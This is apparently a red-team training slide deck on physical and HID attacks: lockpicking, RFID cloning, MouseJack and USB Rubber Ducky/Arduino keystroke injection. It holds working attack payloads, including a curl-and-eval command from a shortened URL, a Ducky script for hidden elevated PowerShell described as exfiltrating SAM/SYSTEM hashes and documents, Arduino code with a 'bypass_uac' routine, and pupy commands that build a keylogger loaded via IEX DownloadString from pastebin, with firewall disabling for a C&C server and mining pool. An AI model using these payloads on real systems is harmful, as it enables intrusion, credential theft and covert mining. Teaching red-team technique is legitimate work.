Red Team Practical Attacks
S01E01
HID attacks - SE techniques
Giacomo Pezzi
Edoardo Rosa
In military jargon, the term Red Team is traditionally used to identify highly skilled and organized groups acting as fictitious rivals and/or enemies to the “regular” forces, the Blue Team.
Historically, a red team was a group of military personnel playing the role of adversaries, the role of the enemy or opposing force team (“RED”), as opposed to the friendly forces team (“BLUE”). With time, the red teams mission and capabilities evolved and they turned into a force tasked with challenging the security posture of military bases, outposts and other “targets”.
Corporations in general and high-tech companies in particular sought a way to test their security posture and see whether they were vulnerable to attacks they didn’t account or plan for. The early civilian red teams were mostly information/computer security professionals mixed with physical security experts and they were mainly focused on what was then possible with the technology of the day.
Today both government and private organizations use Red Teams not only to test the current state of their physical and digital security but also to continuously challenge the plans, defensive measures and security concepts/policies.
These exercises result in a better understanding of possible adversaries and help to improve counter measures against them and future threats.
they help the organization improve its own defensive abilities -> interaction and mutual feedback
..on both sides, human intuition, expertise and cleverness cannot be replaced! So:
If you know the enemy and know yourself, you need not fear the result of a hundred battles.
Sun Tzu: The Art of War
You can have the best firewalls and change control procedures; you can have regular electronic penetration testing against networks and applications; you can audit your source code and lock down your servers. All of these approaches are fine and, if conducted well, are generally worthwhile. However, if an attacker can physically penetrate your premises and access information systems directly, these strategies won’t protect you.
Technologies that are commonly deployed to keep intruders out:
Technologies that are commonly used by a attacker physical pentester:
The art of unlocking a lock by manipulating the components of the lock device without the original key.
only tricks!
Radio-frequency identification uses electromagnetic fields to automatically identify and track tags attached to objects.
Main frequencies:
- 125 KHz
- 13 MHz
4,50 € - read 125 KHz
6,50 € - read 13 MHz
12 € - clone 125 KHz
A human interface device or HID is a type of computer device usually used by humans and takes input and gives output to humans.
The term "HID" most commonly refers to the USB-HID specification.
most of the times don’t need external drivers to operate
not under AntiViruses' scope
An HID Attack could lead to a payload delivery or a data exfiltration simply using a pre-programmed USB stick that act as a HID device: for example a specialized tool to SPOOF keyboard input.
By default, operating systems tend to allow keyboards and mouse full control of the system. Using timed commands, it is easy to run a complete drive-by HID attack in 20 seconds, possibly even less. It also avoids detection in some ways as you are ‘physically pressing the keys’ – or at least, that’s what the computer thinks.
Most antivirus software will not protect you against this kind of an attack.
From OS view the user is typing on his keyboard!!
Vulnerabilities affecting non-Bluetooth wireless mice and keyboard discovered by Marc Newlin by Bastille Threat Research Team.
https://www.bastille.net/
https://www.mousejack.com/
This kind of vulnerabilities enable an attacker to type arbitrary commands into a victim's machine using an USB dongle.
Wireless mice and keyboards cumminicate using a proprietary standard protocols operating in the 2.4GHz ISM band (Industrial, Scientific, Medical):
there is no standard to follow
Each vendor can implement his own security scheme.
Researcher discovered that the some dongles don't implement an encryption protocol at all or the encryption is not flawless and can also process specially crafted packets which generate key press instead of mouse movement/clicks.
- keystroke injection, spoofing a mouse
- keystroke injection, spoofing a keyboard
- forced pair
CrazyRadio PA by bitcraze is an opensource device with an amplified nRF24L-based USB dongle: equivalent to an amplified version of the common USB dongle for mice and keyboards.
- pseudo-promiscuous mode
- packet sniffing
- packet injection
- easy interface
30 € su Amazon......
- choose victim with a possibile unpatched/vulnerable device
- gather informations about OS, keybinding, installed tools, etc
Ty github... <3
- write exploit
DELAY 1000
GUI-SHIFT ENTER
DELAY 600
STRING (x=$(\curl -sL https://bit.ly/2yOCGw8);eval $x)&;disown %1;exit
ENTER
The USB Rubber Ducky is a keystroke injection tool disguised as a generic flash drive. When it is plugged into a computer, it instead registers itself as a USB keyboard on the system and fires off a keystroke payload at lightning speed.
Payloads are crafted using a simple scripting language and can be used to drop reverse shells, inject binaries, brute force pin codes, and many other automated functions for the penetration tester and systems administrator. Writing scripts can be done from any common text editor.
Command | Parameters |
---|---|
REM | - |
DELAY | 0..-> |
STRING | a...z A...Z 0..9 !...) `~ += _- "' :; <, >. ?/ \ and pipe |
REPEAT | (n) numbers of time to repeat |
(*)ARROW | left, right, up or down arrow |
Command | Optional Parameters |
---|---|
GUI | Single char |
SHIFT | DELETE, HOME, INSERT, PAGEUP, PAGEDOWN, WINDOWS, GUI, UPARROW, DOWNARROW, LEFTARROW, RIGHTARROW, TAB |
ALT | END, ESC, ESCAPE, F1...F12, Single Char, SPACE, TAB |
CTRL | BREAK, PAUSE, F1...F12, ESCAPE, ESC, Single Char |
See more on: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Duckyscript
Ducky Scripts are compiled into hex files ready to be named inject.bin and moved to the root of a microSD card for execution by the USB Rubber Ducky. This is done with the tool duckencoder.
Best experience: https://github.com/kevthehermit/DuckToolkit
Best automation: https://ducktoolkit.com/
USB Rubber Ducky
Windows 10 64
Exfiltration & gathering informations:
DELAY 4000
GUI r
DELAY 100
STRING powershell -command "Start-Process powershell -Verb runAs -ArgumentList '-w h -c .(((Get-Volume -FileSystemLabel DUCKY).DriveLetter)+'':\d.cmd'') ' "
DELAY 100
ENTER
DELAY 1100
LEFTARROW
DELAY 50
ENTER
Multi-stager payload -> CAPSLOCK blinking every stage:
"$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
Hidden execution:
d.cmd (executed by keystroke) will invisibly execute e.cmd using the i.vbs
Multi-feature stager:
e.cmd (executed by d.cmd) will execute the p.ps1 -> reporting + SAM/SYSTEM exfiltration
and try to make some pure data exfiltration -> steal files placed in %USERPROFILE%\Documents, until the ducky is unplugged by the attacker
Believability inside:
Looks like a generic flash drive -> TwinDuck firmware
Emulation of the most common USB flash drive chipsets: Alcor Micro Corp's (0x058F) generic 'Flash Drive' (0x6387) -> vidpid.bin on microSD root, optionally hidden
Choose a story for your drive -> NO LIMITS!!!
Arduino Micro is the small board easy to integrate it in everyday objects to make them interactive.
The Micro is based on the ATmega32U4 microcontroller featuring a built-in USB which makes the Micro recognisable as a mouse or keyboard.
#include "Keyboard.h"
void setup() {
Keyboard.begin();
delay(6000);
run_powershell_admin();
payload(String"ciao"));
Keyboard.end();
}
void run_powershell_admin() {
// Win+x
Keyboard.press(KEY_LEFT_GUI);
delay(300);
Keyboard.releaseAll();
Keyboard.println("notepad");
delay(500);
Keyboard.press(KEY_LEFT_CTRL);
Keyboard.press(KEY_LEFT_SHIFT);
Keyboard.press(KEY_RETURN);
Keyboard.releaseAll();
delay(800);
bypass_uac();
}
void bypass_uac() {
Keyboard.press(KEY_LEFT_ARROW);
Keyboard.release(KEY_LEFT_ARROW);
delay(500);
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
delay(800);
}
void payload(String str) {
Keyboard.println(str);
delay(400);
Keyboard.press(KEY_RETURN);
}
void loop() { }
Arduino is able only to inject keystrokes: no drive storage!!!!
Download the payload from a known and controller source: pastebin.com
Disable Firewall to access XMR pool and C&C server
How to start the download?
Run as Administrator
https://github.com/n1nj4sec/pupy
Setup Server:
./pupysh.py -p 4444 -t http
Generate Client Payload:
./pupygen.py -s keylogger -f ps1 -O windows connect --host 192.168.1.111:4444 -t http
Upload to pastebin:
https://pastebin.com/YaUXbj3W
Use inside main script:
IEX ((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/YaUXbj3W'))
String hejo = String("powershell -NoP -NonI -W Hidden -Exec Bypass \"IEX ((New-Object Net.WebClient).
DownloadString('http://pastebin.com/raw/KRQFLR83'));\";exit");
Powershell payload:
Run a powershell console ad Administrator:
void run_powershell_admin() {
// Win+x
Keyboard.press(KEY_LEFT_GUI);
Keyboard.press(char(120));
delay(300);
Keyboard.releaseAll();
// a
Keyboard.press(char(97));
delay(800);
bypass_uac();
}
Execution Time:
11 s
Specs
The Target